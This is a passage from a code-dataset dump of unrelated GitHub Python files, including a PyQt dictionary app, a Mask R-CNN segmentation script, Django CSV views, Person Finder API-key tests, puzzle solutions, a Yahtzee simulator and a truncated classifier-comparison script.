self.ui.listWidget.addItem(english_word)\n \n print(\"Reconnected to database successfully\")\n \n def search(self, text):\n #find words from listWidget\n for i in range(self.ui.listWidget.count()):\n item = self.ui.listWidget.item(i)\n if item.text().lower().startswith(text.lower()):\n item.setHidden(False)\n else:\n item.setHidden(True)\n\n def show_dialog(self, item):\n dialog = Modify_dialog(self)\n dialog.ui.label.setText(item.text())\n dialog.setStyleSheet(\"QDialog {background-color: #FFF9F1;} QDialog:title {color: white; font-size: 16px; font-weight: bold;}\")\n query = QSqlQuery()\n query.prepare(\"SELECT entry.headword FROM translation JOIN entry ON translation.entry_id = entry._id WHERE translation.body = :word\")\n query.bindValue(\":word\", f\"{item.text()}\")\n query.exec_() \n headword = None\n while query.next():\n headword = query.value(0)\n dialog.ui.listWidget.addItem(headword)\n \n #add checkbox for multiple choosing in listWidget\n for i in range(dialog.ui.listWidget.count()):\n definition_item = dialog.ui.listWidget.item(i)\n definition_item.setFlags(definition_item.flags() | Qt.ItemIsUserCheckable)\n definition_item.setCheckState(Qt.Unchecked)\n # print(definition_item.text())\n Font = QFont()\n Font.setFamily(\"Poppins\")\n Font.setPointSize(14)\n dialog.ui.listWidget.setFont(Font)\n \n #button for add definition to database\n dialog.ui.pushButton_3.clicked.connect(lambda: self.add_word_to_database_window(item, dialog, headword))\n\n #button for delete the definition from database\n dialog.ui.pushButton.clicked.connect(lambda: self.delete_word_from_selection(dialog, item))\n\n dialog.finished.connect(lambda: self.reconnect_Eng_data(item))\n \n dialog.ui.pushButton_2.clicked.connect(lambda: self.add_word_to_favourites(dialog, item))\n\n dialog.exec_()\n\n def add_word_to_database_window(self, item, dialog, headword):\n #create a popup window\n popup = QDialog(self.ui.widget)\n popup.setWindowTitle(\"Add English Word\")\n popup.setStyleSheet(\"QDialog {background-color: #FBDA8A;} QDialog:title {color: white; font-size: 16px; font-weight: bold;}\")\n\n #create the input box for English word and Thai word\n english_word_edit = QLineEdit()\n thai_definition_edit = QLineEdit()\n\n #auto input English text after click button\n if isinstance(item.text(), str):\n english_word_edit.setText(item.text())\n else:\n english_word_edit.setText(\"\")\n\n #create explaination text\n english_word_label = QLabel(\"English Word:\")\n thai_definition_label = QLabel(\"Thai Definition:\")\n\n font= QFont()\n font.setFamily(\"Poppins\")\n font.setPointSize(12)\n english_word_edit.setFont(font)\n thai_definition_edit.setFont(font)\n english_word_label.setFont(font)\n thai_definition_label.setFont(font)\n\n #create button\n add_button = QPushButton(\"Add to database\")\n add_button.setFont(font)\n\n\n #create layout\n layout = QHBoxLayout()\n layout.addWidget(english_word_label)\n layout.addWidget(english_word_edit)\n layout.addWidget(thai_definition_label)\n layout.addWidget(thai_definition_edit)\n layout.addWidget(add_button)\n popup.setLayout(layout)\n\n #connect to add word button to database\n add_button.clicked.connect(lambda: self.add_word_to_database(popup , item, english_word_edit, thai_definition_edit, dialog, headword))\n\n #show the pop up window\n popup.exec_()\n\n def add_word_to_database(self, popup, item, english_word_edit, thai_definition_edit, dialog, headword):\n # Create a QSqlQuery object to execute SQL queries on the database\n query = QSqlQuery()\n\n # Execute a SQL query to retrieve the ID of the English word, if it already exists in the database\n query.prepare(\"SELECT _id FROM translation WHERE body = :body AND entry_id IN (SELECT _id FROM entry WHERE headword = :headword)\")\n query.bindValue(\":body\", english_word_edit.text())\n query.bindValue(\":headword\", thai_definition_edit.text())\n query.exec_()\n\n # Check if the query returned a result\n if query.next():\n # The English word already exists in the database, show an error message to the user\n QMessageBox.warning(popup, \"Word already exists\", f\"The word '{thai_definition_edit.text()}' already exists in '{english_word_edit.text()}'.\")\n else:\n # The English word does not exist in the database, insert the Thai and English words\n query.prepare(\"INSERT INTO entry (headword) VALUES (:headword)\")\n query.bindValue(\":headword\", thai_definition_edit.text())\n query.exec_()\n self.db.commit()\n\n # Get the ID of the last inserted row in the entry table\n entry_id = query.lastInsertId()\n\n query.prepare(\"INSERT INTO translation (body, entry_id) VALUES (:body,:entry_id)\")\n query.bindValue(\":body\", english_word_edit.text())\n query.bindValue(\":entry_id\", entry_id)\n query.exec_()\n self.db.commit()\n\n print(f\"English word: {english_word_edit.text()}\")\n print(f\"Thai definition: {thai_definition_edit.text()}\")\n print(f\"id: {entry_id}\")\n\n QMessageBox.information(popup, \"Word added\", f\"The word '{english_word_edit.text()}' has been added to the database.\")\n dialog.ui.listWidget.clear()\n query.prepare(\"SELECT entry.headword FROM translation JOIN entry ON translation.entry_id = entry._id WHERE translation.body = :word\")\n query.bindValue(\":word\", f\"{item.text()}\")\n query.exec_() \n # headword = None\n while query.next():\n headword = query.value(0)\n dialog.ui.listWidget.addItem(headword)\n \n\n\n # Close the dialog\n popup.accept()\n\n \n def delete_word_from_selection(self, dialog, item):\n # Create a QSqlQuery object to execute SQL queries on the database\n query = QSqlQuery()\n\n # Print the selection item in an array\n selected = []\n for i in range(dialog.ui.listWidget.count()):\n item_selected = dialog.ui.listWidget.item(i)\n if item_selected.checkState() == Qt.Checked:\n selected.append(item_selected.text())\n\n # Delete the word from the database\n for i in range(len(selected)):\n query.prepare(\"SELECT _id FROM entry WHERE headword = :headword\")\n query.bindValue(\":headword\", selected[i])\n query.exec_()\n \n if query.next():\n entry_id = query.value(0)\n # print(f\"Deleted {selected[i]}\")\n \n query.prepare(\"DELETE FROM entry WHERE _id = :id\")\n query.bindValue(\":id\", entry_id)\n query.exec_()\n self.db.commit()\n query.prepare(\"DELETE FROM translation WHERE entry_id = :id\")\n query.bindValue(\":id\", entry_id)\n query.exec_()\n self.db.commit()\n \n else:\n print(f\"Entry not found for {selected[i]}\")\n\n dialog.ui.listWidget.clear()\n print(\"clear\")\n \n query.prepare(\"SELECT entry.headword FROM translation JOIN entry ON translation.entry_id = entry._id WHERE translation.body = :word\")\n query.bindValue(\":word\", f\"{item.text()}\")\n query.exec_()\n \n # Clear the selected list and repopulate the listWidget\n while query.next():\n headword = query.value(0)\n dialog.ui.listWidget.addItem(headword)\n \n item_selected = None\n selected = []\n \n\n def reconnect_Eng_data(self, item):\n query = QSqlQuery()\n query.prepare(\"SELECT DISTINCT body from translation\")\n query.exec_()\n self.ui.listWidget.clear()\n while query.next():\n english_word = query.value(0)\n self.ui.listWidget.addItem(english_word)\n\n def add_word_to_favourites(self, dialog, item):\n print(\"_________________________\")\n print(\"add word to favourites\")\n query = QSqlQuery()\n headword = None\n english_word = None\n word_id = None\n temp = None\n \n #execute a SQL query to retrieve data from the database\n query.prepare(\"SELECT entry.headword, translation.body, translation.entry_id FROM translation JOIN entry ON translation.entry_id = entry._id WHERE translation.body = :word\")\n query.bindValue(\":word\", f\"{item.text()}\")\n query.exec_()\n print(\"1\")\n\n while query.next():\n headword = query.value(0)\n english_word = query.value(1)\n word_id = query.value(2)\n\n query.prepare(\"SELECT Word FROM favourite WHERE Word = :word\")\n query.bindValue(\":word\", english_word)\n query.exec_()\n\n while query.next():\n temp = query.value(0)\n \n if temp == english_word:\n print(\"You have already added this word to your favourite list\")\n QMessageBox.information(self, \"Sorry :(\", f\"You have already added '{english_word}' to your favourite list.\")\n return\n\n\n if headword is not None:\n print(\"yay!\")\n \n query.prepare(\"INSERT INTO favourite (entry_id,Word) VALUES (:entry_id,:Word)\")\n query.bindValue(\":entry_id\", word_id)\n query.bindValue(\":Word\", english_word)\n query.exec_()\n self.db.commit()\n QMessageBox.information(self, \"Word added\", f\"The word '{english_word}' has been added to the database.\")\n\n else:\n print(\"no!\")\n QMessageBox.information(self, \"Sorry :(\", f\"The word '{english_word}' doesn't have definition.\")\n dialog.accept()\n \n\n\n\n\n","repo_name":"SFocusP/SETL","sub_path":"Code/page_functions/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":12861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39466427434","text":"\"\"\"\r\nhttps://debuggercafe.com/instance-segmentation-with-pytorch-and-mask-r-cnn/\r\nhttps://pytorch.org/vision/stable/models.html#object-detection-instance-segmentation-and-person-keypoint-detection\r\n\"\"\"\r\n\r\nimport torch\r\nimport random\r\nfrom PIL import Image\r\nfrom torchvision import models, transforms\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nclass InstanceSegmentaion(object):\r\n def __init__(self):\r\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n self.img_transforms = transforms.Compose([\r\n transforms.ToTensor(),\r\n ])\r\n self.model = model = models.detection.maskrcnn_resnet50_fpn(pretrained=True, num_classes=91)\r\n self.model.to(self.device)\r\n self.model.eval()\r\n self.coco_classes_list = [\r\n '__background__', 'person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',\r\n 'train', 'truck', 'boat', 'traffic light', 'fire hydrant', 'N/A', 'stop sign',\r\n 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow',\r\n 'elephant', 'bear', 'zebra', 'giraffe', 'N/A', 'backpack', 'umbrella', 'N/A', 'N/A',\r\n 'handbag', 'tie', 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',\r\n 'kite', 'baseball bat', 'baseball glove', 'skateboard', 'surfboard', 'tennis racket',\r\n 'bottle', 'N/A', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',\r\n 'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',\r\n 'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed', 'N/A', 'dining table',\r\n 'N/A', 'N/A', 'toilet', 'N/A', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone',\r\n 'microwave', 'oven', 'toaster', 'sink', 'refrigerator', 'N/A', 'book',\r\n 'clock', 'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush'\r\n ]\r\n palette = torch.tensor([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])\r\n colors = torch.as_tensor([i for i in range(91)])[:, None] * palette\r\n self.colors = (colors % 255).numpy().astype(\"uint8\")\r\n\r\n def predict_numpy(self, image):\r\n return self._predict_numpy(image)\r\n\r\n def _predict_numpy(self, image):\r\n image = Image.fromarray(image)\r\n image_tensor = self.img_transforms(image)\r\n image_tensor = image_tensor.unsqueeze(0)\r\n image_tensor = image_tensor.to(self.device)\r\n masks, boxes, labels = self._get_outputs(image_tensor)\r\n output = self._draw_segmentation_map(image, masks, boxes, labels)\r\n return output\r\n\r\n def _get_outputs(self, image, threshold=0.95):\r\n with torch.no_grad():\r\n outputs = self.model(image)\r\n scores = list(outputs[0]['scores'].detach().cpu().numpy())\r\n thresholded_preds_inidices = [scores.index(i) for i in scores if i > threshold]\r\n thresholded_preds_count = len(thresholded_preds_inidices)\r\n masks = (outputs[0]['masks']>0.5).squeeze().detach().cpu().numpy()\r\n masks = masks[:thresholded_preds_count]\r\n boxes = [[(int(i[0]), int(i[1])), (int(i[2]), int(i[3]))] for i in outputs[0]['boxes'].detach().cpu()]\r\n boxes = boxes[:thresholded_preds_count]\r\n labels = [self.coco_classes_list[i] for i in outputs[0]['labels']]\r\n return masks, boxes, labels\r\n\r\n def _draw_segmentation_map(self, image, masks, boxes, labels):\r\n alpha = 1 \r\n beta = 0.6\r\n gamma = 0\r\n for i in range(len(masks)):\r\n red_map = np.zeros_like(masks[i]).astype(np.uint8)\r\n green_map = np.zeros_like(masks[i]).astype(np.uint8)\r\n blue_map = np.zeros_like(masks[i]).astype(np.uint8)\r\n color = self.colors[random.randrange(0, len(self.colors))]\r\n red_map[masks[i] == 1], green_map[masks[i] == 1], blue_map[masks[i] == 1] = color\r\n segmentation_map = np.stack([red_map, green_map, blue_map], axis=2)\r\n image = np.array(image)\r\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\r\n cv2.addWeighted(image, alpha, segmentation_map, beta, gamma, image)\r\n cv2.rectangle(image, boxes[i][0], boxes[i][1], color=tuple(color.tolist()), \r\n thickness=2)\r\n cv2.putText(image , labels[i], (boxes[i][0][0], boxes[i][0][1]-10), \r\n cv2.FONT_HERSHEY_SIMPLEX, 1, tuple(color.tolist()), \r\n thickness=2, lineType=cv2.LINE_AA)\r\n return image\r\n\r\n\r\nif __name__ == \"__main__\":\r\n image_path = 'test.jpg'\r\n kjn = InstanceSegmentaion()\r\n image = cv2.imread(image_path)\r\n output = kjn.predict_numpy(image)\r\n cv2.imshow(\"dupa.jpg\", output)\r\n cv2.waitKey(0)\r\n","repo_name":"kornellewy/youtube-collection","sub_path":"czym_jest_segmentacja_oraz_jak_jej_używać/instance_seg.py","file_name":"instance_seg.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"20714353884","text":"import unittest\nimport json\nfrom app.src.services.example_service_two import ServiceTwo\n\n\nclass TestServiceTwo(unittest.TestCase):\n\n def test_post_method_request_and_response(self):\n obj = ServiceTwo()\n jsonmsg = '{\"name\":\"Jeet\"}'\n data = json.loads(jsonmsg)\n\n output = obj.service_method(data)\n\n assert isinstance(json.loads(output), dict)\n\n\n# if __name__ == '__main__':\n# unittest.main()\n","repo_name":"jitendra-github-lab/flask-blueprint-framework","sub_path":"ds-arch-type/{{cookiecutter.project_name}}/app_tests/units/TestServiceTwo.py","file_name":"TestServiceTwo.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14857798935","text":"from django.shortcuts import render\r\n\r\n# Create your views here.\r\nfrom django.http import HttpResponse\r\nfrom django.template import loader\r\nfrom .models import Question\r\nfrom django.core.files.storage import FileSystemStorage # 파일저장\r\nimport pandas as pd\r\nimport os\r\n\r\n\r\ndef CSV(request):\r\n if request.method == 'POST':\r\n try:\r\n col_li = []\r\n total_data_li = []\r\n file = request.FILES['fileInput']\r\n fs = FileSystemStorage()\r\n filename = fs.save(\"파일명.csv\", file)\r\n try:\r\n dfs = pd.read_csv(\"C:/Users/user/mysite/파일명.csv\",encoding = 'ansi').head(5)\r\n except:\r\n dfs = pd.read_csv(\"C:/Users/user/mysite/파일명.csv\",encoding = 'utf-8').head(5)\r\n \r\n os.remove(\"C:/Users/user/mysite/파일명.csv\")\r\n df_len = len(dfs)\r\n columns = dfs.columns\r\n\r\n for i in columns:\r\n col_li.append(i)\r\n\r\n for i in range(df_len):\r\n data_li = []\r\n for j in columns:\r\n data_li.append(dfs.loc[i,j])\r\n total_data_li.append(data_li)\r\n \r\n\r\n return render(request,'polls/index.html',{'result':col_li,\"data\":total_data_li,\"file\": file})\r\n except:\r\n return render(request,'polls/index.html') \r\n\r\n return render(request,'polls/index.html')\r\n\r\n\r\ndef CSV2(request):\r\n if request.method == 'POST':\r\n\r\n file_name = request.POST['hidden_name']\r\n\r\n col_li = request.POST['columns']\r\n col_li = col_li.lstrip(\"[\")\r\n col_li = col_li.rstrip(\"]\")\r\n col_li = col_li.replace(\"'\" , \"\")\r\n col_li = col_li.split(\", \")\r\n\r\n total_data_li = request.POST['datas']\r\n total_data_li = total_data_li[1:len(total_data_li)-1]\r\n total_data_li = total_data_li.split(\"], \")\r\n\r\n\r\n new_data_li = []\r\n for i in total_data_li:\r\n elements = i + \"]\"\r\n elements = elements.lstrip(\"[\")\r\n elements = elements.rstrip(\"]\")\r\n elements = elements.replace(\"'\",\"\")\r\n elements = elements.split(\", \")\r\n new_data_li.append(elements)\r\n\r\n exclusive_list = []\r\n\r\n df = pd.DataFrame(new_data_li, columns = col_li)\r\n \r\n for i in col_li:\r\n exclusive_num = request.POST[i]\r\n if exclusive_num == \"1\":\r\n booleans = True\r\n else:\r\n booleans = False\r\n exclusive_list.append(booleans)\r\n \r\n df = df.loc[:, exclusive_list]\r\n\r\n df_len = len(df)\r\n columns = df.columns\r\n\r\n updated_col_li = []\r\n\r\n for i in columns:\r\n updated_col_li.append(i)\r\n\r\n\r\n updated_total_data_li = []\r\n\r\n for i in range(df_len):\r\n data_li = []\r\n for j in updated_col_li:\r\n data_li.append(df.loc[i,j])\r\n updated_total_data_li.append(data_li)\r\n\r\n\r\n return render(request,'polls/index.html',{'result':col_li,\"data\":new_data_li,\"updated_col_li\":updated_col_li,\"updated_total_data_li\":updated_total_data_li,\"file\":file_name})\r\n return render(request,'polls/index.html') \r\n","repo_name":"Junior1Jun/DJango---Python","sub_path":"2022-11-22 장고 views.py","file_name":"2022-11-22 장고 views.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36360564040","text":"import django.http\n\nimport model\n\nimport view_tests_base\n\n\nclass ApiKeyListViewTests(view_tests_base.ViewTestsBase):\n \"\"\"Tests the admin API keys list view.\"\"\"\n\n def setUp(self):\n super(ApiKeyListViewTests, self).setUp()\n self.data_generator.repo()\n self.authorization = self.data_generator.authorization()\n self.login_as_superadmin()\n\n def test_get(self):\n \"\"\"Tests GET requests.\"\"\"\n doc = self.to_doc(self.client.get(\n '/haiti/admin/api_keys/list/', secure=True))\n self.assertTrue('Bob Vance' in doc.text)\n self.assertTrue('bob@fridge.com' in doc.text)\n self.assertTrue('Vance Refrigeration' in doc.text)\n # The first 10 elements with the \"permissions\" class are the\n # \"Permissions\" header and the individual permissions column headers.\n permissions_row = [el.text for el in doc.cssselect('.permission')[10:]]\n expected_permissions = [\n 'fridge.com', 'x', 'x', 'x', None, None, None, None, 'x']\n self.assertEqual(permissions_row, expected_permissions)\n\n\nclass ApiKeyManagementViewTests(view_tests_base.ViewTestsBase):\n \"\"\"Tests the API key management view.\"\"\"\n\n def init_testbed_stubs(self):\n self.testbed.init_user_stub()\n self.testbed.init_datastore_v3_stub()\n\n def setUp(self):\n super(ApiKeyManagementViewTests, self).setUp()\n self.login_as_superadmin()\n\n def test_get_create_form(self):\n \"\"\"Tests GET requests with no log key (i.e., the creation form).\"\"\"\n self.authorization = self.data_generator.authorization()\n res = self.client.get('/haiti/admin/api_keys/', secure=True)\n self.assertEqual(res.context['target_key'],\n model.Authorization.DEFAULT_SETTINGS)\n self.assertEqual(res.context['operation_type'], 'create')\n\n def test_get_update_form(self):\n \"\"\"Tests GET requests with a log key specified (i.e., an update form).\n \"\"\"\n self.authorization = self.data_generator.authorization()\n management_log = model.ApiKeyManagementLog(\n repo='haiti',\n api_key=self.authorization.api_key,\n action=model.ApiKeyManagementLog.CREATE,\n ip_address='123.45.67.89',\n key_state=self.authorization.summary_str())\n management_log.put()\n res = self.client.get(\n '/haiti/admin/api_keys/',\n data={'log_key': management_log.key()},\n secure=True)\n self.assertEqual(res.context['target_key'].key(),\n self.authorization.key())\n self.assertEqual(res.context['operation_type'], 'update')\n\n def test_post_render_update_form(self):\n \"\"\"Tests POST requests to show the update form.\"\"\"\n self.authorization = self.data_generator.authorization()\n params = {\n 'edit_form': '1',\n 'authorization_key': self.authorization.key(),\n 'xsrf_token': self.xsrf_token('admin_api_keys'),\n }\n res = self.client.post(\n '/haiti/admin/api_keys/', data=params, secure=True)\n self.assertEqual(res.context['target_key'].key(),\n self.authorization.key())\n self.assertEqual(res.context['operation_type'], 'update')\n\n def test_create_key(self):\n \"\"\"Tests POST requests to create a new key.\"\"\"\n params = {\n 'contact_name': 'Creed Bratton',\n 'contact_email': 'creed@aol.com',\n 'organization_name': 'Creed Inc.',\n 'read_permission': 'true',\n 'search_permission': 'true',\n 'is_valid': 'true',\n 'xsrf_token': self.xsrf_token('admin_api_keys'),\n }\n res = self.client.post(\n '/haiti/admin/api_keys/', data=params, secure=True,\n REMOTE_ADDR='11.22.33.44')\n # Check that the Authorization entity was generated correctly.\n auths = model.Authorization.all().filter('repo =', 'haiti')\n self.assertEqual(auths.count(), 1)\n auth = auths[0]\n self.assertEqual(auth.contact_name, 'Creed Bratton')\n self.assertEqual(auth.contact_email, 'creed@aol.com')\n self.assertEqual(auth.organization_name, 'Creed Inc.')\n self.assertTrue(auth.read_permission)\n self.assertTrue(auth.search_permission)\n self.assertTrue(auth.is_valid)\n self.assertIsNone(auth.domain_write_permission)\n self.assertFalse(auth.full_read_permission)\n self.assertFalse(auth.subscribe_permission)\n self.assertFalse(auth.mark_notes_reviewed)\n self.assertFalse(auth.believed_dead_permission)\n self.assertFalse(auth.stats_permission)\n self.assertIsInstance(res, django.http.HttpResponseRedirect)\n # A management log entry should have been created.\n management_logs = model.ApiKeyManagementLog.all()\n self.assertEqual(1, management_logs.count())\n management_log = management_logs[0]\n self.assertEqual(management_log.repo, 'haiti')\n self.assertEqual(management_log.api_key, auth.api_key)\n self.assertEqual(\n management_log.action, model.ApiKeyManagementLog.CREATE)\n self.assertEqual(management_log.ip_address, '11.22.33.44')\n self.assertTrue('Creed' in management_log.key_state)\n # The user should be redirected to the form with the log key in a GET\n # parameter.\n self.assertEqual(\n res.url,\n 'https://testserver/haiti/admin/api_keys?repo=haiti&log_key=%s' %\n management_log.key())\n\n def test_update_key(self):\n \"\"\"Tests POST request to update an existing key.\"\"\"\n self.authorization = self.data_generator.authorization()\n params = {\n 'key': self.authorization.key(),\n 'contact_name': 'Phyllis Vance',\n 'contact_email': 'phyllis@fridge.com',\n 'organization_name': 'Vance Refrigeration',\n 'domain_write_permission': 'fridge.com',\n 'read_permission': 'true',\n 'full_read_permission': 'true',\n 'search_permission': 'true',\n 'subscribe_permission': 'true',\n 'is_valid': 'true',\n 'xsrf_token': self.xsrf_token('admin_api_keys'),\n }\n res = self.client.post(\n '/haiti/admin/api_keys/', data=params, secure=True,\n REMOTE_ADDR='11.22.33.44')\n # Check that the Authorization entity was updated correctly.\n auths = model.Authorization.all().filter('repo =', 'haiti')\n self.assertEqual(auths.count(), 1)\n auth = auths[0]\n self.assertEqual(auth.key(), self.authorization.key())\n # Check that changes were made.\n self.assertEqual(auth.contact_name, 'Phyllis Vance')\n self.assertEqual(auth.contact_email, 'phyllis@fridge.com')\n self.assertTrue(auth.subscribe_permission)\n # A management log entry should have been created.\n management_logs = model.ApiKeyManagementLog.all()\n self.assertEqual(1, management_logs.count())\n management_log = management_logs[0]\n self.assertEqual(management_log.repo, 'haiti')\n self.assertEqual(management_log.api_key, auth.api_key)\n self.assertEqual(\n management_log.action, model.ApiKeyManagementLog.UPDATE)\n self.assertEqual(management_log.ip_address, '11.22.33.44')\n self.assertTrue('Phyllis' in management_log.key_state)\n # The user should be redirected to the form with the log key in a GET\n # parameter.\n self.assertEqual(\n res.url,\n 'https://testserver/haiti/admin/api_keys?repo=haiti&log_key=%s' %\n management_log.key())\n","repo_name":"google/personfinder","sub_path":"tests/views/test_admin_api_keys.py","file_name":"test_admin_api_keys.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","stars":515,"dataset":"github-code","pt":"37"} +{"seq_id":"18884543261","text":"from itertools import chain\n\nlines = open('input').read().splitlines()\n\no = lines[0].split(',')\nboards = [\n [l.split() for l in b]\n for b in zip(*[lines[i::6] for i in range(2, 7)])\n]\n\n\ndef score(board):\n return min(score_rows(board), score_rows(list(zip(*board))))\n\n\ndef score_rows(board):\n steps = min(max(o.index(num) for num in row) for row in board)\n score = sum(int(num) for num in chain(*board) if o.index(num) > steps) * int(o[steps])\n return steps, score\n\n\n# Part 1\nprint(min(map(score, boards)))\n\n# Part 2\nprint(max(map(score, boards)))\n","repo_name":"matus-pikuliak/advent_2021","sub_path":"04/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43030949030","text":"# Yahtzee_template.py\n# Created by David C. Tuttle\n# Last modified: April 2, 2018\n\nimport random\nimport collections\n\nNUM_SIDES = 6 # Number of sides on each die\nNUM_DICE = 5 # Number of dice in the game\nNUM_ROLLS = 3 # Number of rolls for each test\nNUM_TESTS = 1000 # Number of tests to perform\n\n# ***** Definition of Die object class and methods go here ***\n\n# PART I - DEFINING THE DIE CLASS goes here\nclass Die():\n def __init__(self, number_of_sides):\n self.side_num = number_of_sides\n self.rolled = 0\n\n def roll(self):\n self.rolled = random.randint(1, self.side_num)\n\n def value(self):\n return self.rolled\n\n# ***** End of Die class definition **************************\n\n# list of Die objects -> boolean\n# expects a list of Die objects\n# returns True if all values of the Die objects match (a \"Yahtzee\")\n# returns False otherwise\n\ndef is_yahtzee(the_dice):\n result = True\n for i in range(1, NUM_DICE):\n if the_dice[i].value() != the_dice[i-1].value():\n result = False\n return result\n\n# list of Die objects -> nothing\n# expects a list of Die objects\n# returns nothing\n# side effect: prints to screen the values on the dice\n\ndef print_dice(the_dice):\n print(\"The dice values are: {0}\".format([i.value() for i in the_dice]))\n\n# list of Die objects -> int\n# expects a list of Die objects\n# examines the values of the dice, and determines which value\n# is most common\n# returns that most common value found\n# Examples: the_dice values of [1, 5, 4, 5, 5] will return 5\n# the_dice values of [2, 6, 2, 6, 4] will return 2 or 6\n\ndef best_value_to_keep(the_dice):\n # Create a counter dictionary of the values in the_dice[]\n dice_counter = collections.Counter(i.value() for i in the_dice)\n \n # Look for the greatest number of dice that match each other\n how_many_dice_match = max(dice_counter.values())\n \n # Find which value on the dice (that is, which key in the counter)\n # corresponds to how_many_dice_match (if a tie, either value is OK)\n for i in list(dice_counter.keys()):\n if dice_counter[i] == how_many_dice_match:\n value_to_keep = i\n \n # value_to_keep is now the most commonly found value on the dice\n return value_to_keep\n\n# *************** play_yahtzee code goes here ********************\n\n# list of Die objects -> boolean\n# expects a list of Die objects\n# Rolls the dice NUM_ROLLS times to try to get a \"Yahtzee\"\n# A Yahtzee is when all the dice have the same value\n# returns True if a Yahtzee occurs, or False otherwise\n#\n# side effect: prints to the screen the values of the dice\n# (by calling print_dice(the_dice)) after each roll,\n# and a single-line \"Yahtzee\" or \"No Yahtzee\" message at the end\n\n# PART II - Writing the play_yahtzee function goes here\n\ndef play_yahtzee(the_dice):\n for i in range(0, NUM_DICE):\n the_dice[i].roll()\n\n print_dice(the_dice)\n num_rolled = 1\n\n while(num_rolled < NUM_ROLLS and not is_yahtzee(the_dice)):\n for i in range(0, NUM_DICE):\n if(the_dice[i].value() != best_value_to_keep(the_dice)):\n the_dice[i].roll()\n print_dice(the_dice)\n num_rolled += 1\n\n if is_yahtzee(the_dice):\n print(\"Yahtzee!\")\n else:\n print(\"No yahtzee... :c\")\n return is_yahtzee(the_dice)\n\n# *************** end play_yahtzee code **************************\n\n# *** The \"main\" code to run play_yahtzee() NUM_TIMES times goes here ***\n\n# PART III - Code to run play_yahtzee multiple times goes here\n\nthe_dice = []\n\nfor i in range(0, NUM_DICE):\n the_dice.append(Die(NUM_SIDES))\n\n# Now, write a loop to call play_yahtzee(my_dice) NUM_TIMES times.\n# Use a local variable to keep track of the\n# number of Yahtzees that occur, and compute the percentage of\n# tests the resulted in a Yahtzee. Print the number of tests,\n# the number of Yahtzees, and the percentage of success\n# to the screen in an easy to read and understand manner\nnum_yahtzees = 0\nfor i in range(0,NUM_TESTS):\n if play_yahtzee(the_dice):\n num_yahtzees +=1\n\nprint(num_yahtzees, \"yahtzees out of\", NUM_TESTS)\nprint(\"{:.0%} percent success rate!\".format(num_yahtzees / NUM_TESTS))\n\n# *** End of \"main\" code ***\n","repo_name":"EliLPeters/Spring-2018-Schoolwork","sub_path":"CS 232 Python/Homework/CS232-04-elp5.py","file_name":"CS232-04-elp5.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6902758779","text":"import numpy as np\nimport sklearn.datasets as sk_dataset\nimport random\nimport math\nimport matplotlib.pyplot as plt\nfrom sklearn.naive_bayes import GaussianNB\nimport seaborn as sns\nfrom collections import Counter, defaultdict\nfrom minepy import MINE\nimport pandas as pd\nimport operator\nimport datetime\nimport time\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import MinMaxScaler\nfrom itertools import combinations\nfrom sklearn.metrics import mutual_info_score\nfrom sklearn import metrics\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn import svm\nfrom sklearn import tree\n\nfrom sklearn.naive_bayes import GaussianNB\n\ndef prepare_data(dataset,proportion):\n label = dataset[:,-1]\n data = dataset[:,:-1]\n\n n_class = len(set(label))\n\n shuffle_index = np.arange(len(label))\n np.random.shuffle(shuffle_index)\n\n train_number = int(proportion * len(label))\n train_index = shuffle_index[:train_number]\n #print(train_index)\n val_index = shuffle_index[train_number:]\n #print(val_index)\n return train_index,val_index\n\n\n\nX = np.loadtxt('统计的数据集/整理好的数据集/adult(1).txt')\n\n\n\nm=X.shape[1]-1\nvector_data=X[:,:-1]\nlabel_data=X[:,-1]\n\n # 贝叶斯算法离散化后\narray1 = np.zeros(shape = (0, X.shape[0]))\nfor n in range(0, m):\n k = 8\n d1 = pd.cut(vector_data[:, n], k, labels = range(k))\n array1 = np.vstack((array1, d1))\narray1 = np.vstack((array1, label_data))\nX1 = array1.T\n\n#print(X)\n#print(X1)\nvector_data_NBC = X1[:, :-1]\nlabel_data_NBC = X1[:, -1]\n\nvector_data_RVFL=X[:,:-1]\nlabel_data_RVFL=X[:,-1]\n\ntrain_accuracy_svc=[]\ntest_accuracy_svc=[]\n\ntrain_accuracy_NN=[]\ntest_accuracy_NN=[]\n\ntrain_accuracy_NB=[]\ntest_accuracy_NB=[]\n\ntrain_accuracy_cart=[]\ntest_accuracy_cart=[]\n\ntrain_accuracy_rt=[]\ntest_accuracy_rt=[]\n\nfor k in range(0, 1):\n train_index, val_index = prepare_data(X, 0.7)\n train_data_NBC = vector_data_NBC[train_index]\n train_label_NBC = label_data_NBC[train_index]\n test_data_NBC = vector_data_NBC[val_index]\n test_label_NBC = 